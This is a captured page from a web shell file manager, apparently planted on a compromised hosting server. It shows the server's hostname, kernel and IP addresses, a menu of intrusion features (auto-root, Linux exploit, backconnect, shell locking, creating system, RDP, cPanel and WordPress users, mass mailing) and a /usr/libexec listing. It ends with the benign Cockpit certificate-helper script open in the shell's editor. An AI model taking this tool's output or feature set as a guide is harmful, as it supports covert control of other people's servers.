Linux server.hostify.co.in 5.14.0-611.49.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Tue Apr 21 16:39:08 EDT 2026 x86_64
Apache
: 162.214.74.213 | : 216.73.216.77
438 Domain
8.2.31
orangegroceries
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
libexec /
[ HOME SHELL ]
Name
Size
Permission
Action
awk
[ DIR ]
drwxr-xr-x
bluetooth
[ DIR ]
drwxr-xr-x
cloud-init
[ DIR ]
drwxr-xr-x
coreutils
[ DIR ]
drwxr-xr-x
cpanel-pdns
[ DIR ]
drwxr-xr-x
dovecot
[ DIR ]
drwxr-xr-x
dpkg
[ DIR ]
drwxr-xr-x
gawk
[ DIR ]
drwxr-xr-x
gcc
[ DIR ]
drwxr-xr-x
geoclue-2.0
[ DIR ]
drwxr-xr-x
getconf
[ DIR ]
drwxr-xr-x
git-core
[ DIR ]
drwxr-xr-x
grub2
[ DIR ]
drwxr-xr-x
grubby
[ DIR ]
drwxr-xr-x
gstreamer-1.0
[ DIR ]
drwxr-xr-x
hostname
[ DIR ]
drwxr-xr-x
imunify-notifier
[ DIR ]
drwxr-xr-x
initscripts
[ DIR ]
drwxr-xr-x
installkernel
[ DIR ]
drwxr-xr-x
iptables
[ DIR ]
drwxr-xr-x
irqbalance
[ DIR ]
drwxr-xr-x
linux-boot-probes
[ DIR ]
drwxr-xr-x
lsm.d
[ DIR ]
drwxr-xr-x
man-db
[ DIR ]
drwxr-xr-x
microcode_ctl
[ DIR ]
drwxr-xr-x
nfs-utils
[ DIR ]
drwxr-xr-x
openldap
[ DIR ]
drwxr-xr-x
openssh
[ DIR ]
drwxr-xr-x
os-prober
[ DIR ]
drwxr-xr-x
os-probes
[ DIR ]
drwxr-xr-x
p11-kit
[ DIR ]
drwxr-xr-x
psacct
[ DIR ]
drwxr-xr-x
rsyslog
[ DIR ]
drwxr-xr-x
selinux
[ DIR ]
drwxr-xr-x
smartmontools
[ DIR ]
drwxr-xr-x
sssd
[ DIR ]
drwxr-xr-x
sudo
[ DIR ]
drwxr-xr-x
totem-pl-parser
[ DIR ]
drwxr-xr-x
tracker3
[ DIR ]
drwxr-xr-x
tuned
[ DIR ]
drwxr-xr-x
utempter
[ DIR ]
drwxr-xr-x
arptables-helper
1.27
KB
-rwxr-xr-x
arptables-nft-helper
1.27
KB
-rwxr-xr-x
at-spi-bus-launcher
32.12
KB
-rwxr-xr-x
at-spi2-registryd
81.38
KB
-rwxr-xr-x
cockpit-askpass
239
B
-rwxr-xr-x
cockpit-certificate-ensure
23.29
KB
-rwxr-xr-x
cockpit-certificate-helper
5.72
KB
-rwxr-xr-x
cockpit-client
12.17
KB
-rwxr-xr-x
cockpit-client.ui
4.13
KB
-rw-r--r--
cockpit-desktop
5.12
KB
-rwxr-xr-x
cockpit-session
59.69
KB
-rwxr-xr-x
cockpit-tls
47.76
KB
-rwxr-xr-x
cockpit-ws
255.73
KB
-rwxr-xr-x
cockpit-wsinstance-factory
15.19
KB
-rwxr-xr-x
dconf-service
77.01
KB
-rwxr-xr-x
dirmngr_ldap
40.03
KB
-rwxr-xr-x
dnf-utils
3.6
KB
-rwxr-xr-x
exim.daemon
761
B
-rwxr-xr-x
fips-setup-helper
333
B
-rwxr-xr-x
flatpak-oci-authenticator
1.19
MB
-rwxr-xr-x
flatpak-portal
1.3
MB
-rwxr-xr-x
flatpak-session-helper
171.27
KB
-rwxr-xr-x
flatpak-system-helper
1.22
MB
-rwxr-xr-x
flatpak-validate-icon
15.45
KB
-rwxr-xr-x
fprintd
133.97
KB
-rwxr-xr-x
generate-rndc-key.sh
681
B
-rwxr-xr-x
geoclue
240.77
KB
-rwxr-xr-x
glib-pacrunner
24
KB
-rwxr-xr-x
gpg-check-pattern
59.91
KB
-rwxr-xr-x
gpg-pair-tool
64.48
KB
-rwxr-xr-x
gpg-preset-passphrase
35.74
KB
-rwxr-xr-x
gpg-protect-tool
84.68
KB
-rwxr-xr-x
gpg-wks-client
50
B
-rwxr-xr-x
grepconf.sh
257
B
-rwxr-xr-x
import-state
1.04
KB
-rwxr-xr-x
imunify-message-gateway
5.93
MB
-rwxr-xr-x
keyboxd
158.24
KB
-rwxr-xr-x
loadmodules
237
B
-rwxr-xr-x
low-memory-monitor
28.33
KB
-rwxr-xr-x
lvresize_fs_helper
9.57
KB
-rwxr-xr-x
mlocate-run-updatedb
142
B
-rwxr-x---
nfsrahead
27.3
KB
-rwxr-xr-x
nm-daemon-helper
15.3
KB
-rwxr-xr-x
nm-dhcp-helper
19.23
KB
-rwxr-xr-x
nm-dispatcher
76.6
KB
-rwxr-xr-x
nm-initrd-generator
771.93
KB
-rwxr-xr-x
nm-priv-helper
39.91
KB
-rwxr-xr-x
packagekit-direct
148.53
KB
-rwxr-xr-x
packagekitd
338.64
KB
-rwxr-xr-x
pk-offline-update
31.43
KB
-rwxr-xr-x
platform-python
15.09
KB
-rwxr-xr-x
platform-python3.9
15.09
KB
-rwxr-xr-x
realmd
289.33
KB
-rwxr-xr-x
report-command-error
8.06
MB
-rwxr-xr-x
revokefs-fuse
32.26
KB
-rwxr-xr-x
rtkit-daemon
68.02
KB
-rwxr-xr-x
run-with-intensity
6.1
MB
-rwxr-xr-x
scdaemon
427.34
KB
-rwxr-xr-x
tracker-extract-3
133.17
KB
-rwxr-xr-x
tracker-miner-fs-3
149.47
KB
-rwxr-xr-x
tracker-miner-fs-control-3
72.16
KB
-rwxr-xr-x
tracker-writeback-3
43.71
KB
-rwxr-xr-x
tracker-xdg-portal-3
39.69
KB
-rwxr-xr-x
upowerd
240.27
KB
-rwxr-xr-x
vi
1.38
MB
-rwxr-xr-x
virt-what-cpuid-helper
15.11
KB
-rwxr-xr-x
xdg-desktop-portal
725.42
KB
-rwxr-xr-x
xdg-desktop-portal-gtk
333.3
KB
-rwxr-xr-x
xdg-document-portal
202.93
KB
-rwxr-xr-x
xdg-permission-store
84.7
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : cockpit-certificate-helper
#!/usr/bin/bash set -eu # shellcheck disable=SC2034 # prefix= is set because the default /etc contains "${prefix}" prefix="/usr" COCKPIT_CONFIG="/etc/cockpit" COCKPIT_WS_CERTS_D="${COCKPIT_CONFIG}/ws-certs.d" COCKPIT_RUNTIME_DIR="/run/cockpit" install_cert() { local destination="${COCKPIT_WS_CERTS_D}/$1" mv -Z "$1" "${destination}" # The certificate should be world-readable chmod a+r "${destination}" # Force flush to disk for embedded devices sync "${destination}" } install_key() { local destination="${COCKPIT_WS_CERTS_D}/$1" mv -Z "$1" "${destination}" # Force flush to disk for embedded devices sync "${destination}" } selfsign_sscg() { sscg --quiet \ --lifetime "${DAYS}" \ --cert-key-file "${KEYFILE}" \ --cert-file "${CERTFILE}" \ --ca-file "${CA_FILE}" \ --hostname "${HOSTNAME}" \ --organization "${MACHINE_ID:-unspecified}" \ --subject-alt-name localhost \ --subject-alt-name IP:127.0.0.1/255.255.255.255 } selfsign_openssl() { openssl req -x509 \ -days "${DAYS}" \ -newkey rsa \ -keyout "${KEYFILE}" \ -keyform PEM \ -nodes \ -out "${CERTFILE}" \ -outform PEM \ -subj "${MACHINE_ID:+/O=${MACHINE_ID}}/CN=${HOSTNAME}" \ -addext "subjectAltName=IP:127.0.0.1,DNS:localhost" \ -addext "basicConstraints = critical,CA:TRUE" \ -addext "keyUsage = critical,digitalSignature,cRLSign,keyCertSign,keyEncipherment,keyAgreement" \ -addext "extendedKeyUsage = serverAuth" } cmd_selfsign() { # Common variables used by both methods local MACHINE_ID if [ -e /etc/machine-id ]; then MACHINE_ID="$(tr -d -c '[:xdigit:]' < /etc/machine-id)" fi local HOSTNAME="${HOSTNAME:-$(hostname)}" local CERTFILE="0-self-signed.cert" local KEYFILE="0-self-signed.key" local CA_FILE="0-self-signed-ca.pem" # do not stomp over a partial key -- the admin tried to do something wrong if [ -e "${COCKPIT_WS_CERTS_D}/${KEYFILE}" ] && [ ! -e "${COCKPIT_WS_CERTS_D}/${CERTFILE}" ]; then echo "Error: Found $KEYFILE but no $CERTFILE. Please remove the key file first." >&2 exit 1 fi mkdir -pZ "$COCKPIT_WS_CERTS_D" # We renew certificates up to 30 days before expiry, so give ourselves a # year, plus 30 days. The maximum is variously mentioned to be 397 or 398. local DAYS=395 # If sscg fails, try openssl selfsign_sscg || selfsign_openssl # Install the files and set permissions ($CA_FILE is only created by sscg) test ! -e "${CA_FILE}" || install_cert "${CA_FILE}" install_cert "${CERTFILE}" install_key "${KEYFILE}" } cmd_ipa_request() { local USER="$1" # IPA operations require auth; read password from stdin to avoid quoting issues # if kinit fails, we can't handle this setup, exit cleanly kinit "${USER}@${REALM}" || exit 0 # ensure this gets run with a non-C locale; ipa fails otherwise if [ "$(sh -c 'eval `locale`; echo $LC_CTYPE')" = 'C' ]; then export LC_CTYPE=C.UTF-8 fi # create a kerberos Service Principal Name for cockpit-ws, unless already present ipa service-show "${SERVICE}" || \ ipa service-add --ok-as-delegate=true --ok-to-auth-as-delegate=true --force "${SERVICE}" # add cockpit-ws key, unless already present klist -k "${KEYTAB}" | grep -qF "${SERVICE}" || \ ipa-getkeytab -p "HTTP/${HOST}" -k "${KEYTAB}" # request the certificate and put it into our certificate directory, so that auto-refresh works mkdir -pZ "$COCKPIT_WS_CERTS_D" ipa-getcert request -f "${COCKPIT_WS_CERTS_D}/10-ipa.cert" -k "${COCKPIT_WS_CERTS_D}/10-ipa.key" -K "HTTP/${HOST}" -m 640 -o root:root -M 644 -w -v } cmd_ipa_cleanup() { # clean up keytab if [ -e "${KEYTAB}" ]; then ipa-rmkeytab -k "${KEYTAB}" -p "${SERVICE}" fi # clean up certificate; support both "copy" and "direct" modes from cmd_ipa_request() if [ -e "${COCKPIT_WS_CERTS_D}/10-ipa.key" ]; then rm "${COCKPIT_WS_CERTS_D}/10-ipa.cert" "${COCKPIT_WS_CERTS_D}/10-ipa.key" ipa-getcert stop-tracking -f "${COCKPIT_WS_CERTS_D}/10-ipa.cert" -k "${COCKPIT_WS_CERTS_D}/10-ipa.key" || \ ipa-getcert stop-tracking -f /run/cockpit/certificate-helper/10-ipa.cert -k /run/cockpit/certificate-helper/10-ipa.key fi } cmd_ipa() { local REALM="$2" local HOST HOST="$(hostname -f)" local SERVICE="HTTP/${HOST}@${REALM}" local KEYTAB="${COCKPIT_CONFIG}/krb5.keytab" # use a temporary keytab to avoid interfering with the system one export KRB5CCNAME=/run/cockpit/keytab-setup # not an IPA setup? cannot handle this if [ -z "$(which ipa)" ]; then echo 'ipa must be installed for this command' exit 1 fi case "$1" in request) cmd_ipa_request "$3" ;; cleanup) cmd_ipa_cleanup ;; *) echo 'unknown subcommand' exit 1 ;; esac } main() { # ipa-getkeytab needs root to create the file, same for cert installation if [ "$(id -u)" != "0" ]; then echo 'must be run as root' exit 1 fi # Create a private working directory mkdir -p "${COCKPIT_RUNTIME_DIR}" WORKDIR="${COCKPIT_RUNTIME_DIR}/certificate-helper" mkdir -m 700 "${WORKDIR}" # we expect that not to have existed trap 'exit' INT QUIT PIPE TERM trap 'rm -rf "${WORKDIR}"' EXIT cd "${WORKDIR}" # Dispatch subcommand case "$1" in selfsign) cmd_selfsign ;; ipa) shift cmd_ipa "$@" ;; *) echo 'unknown subcommand' exit 1 ;; esac } main "$@"
Close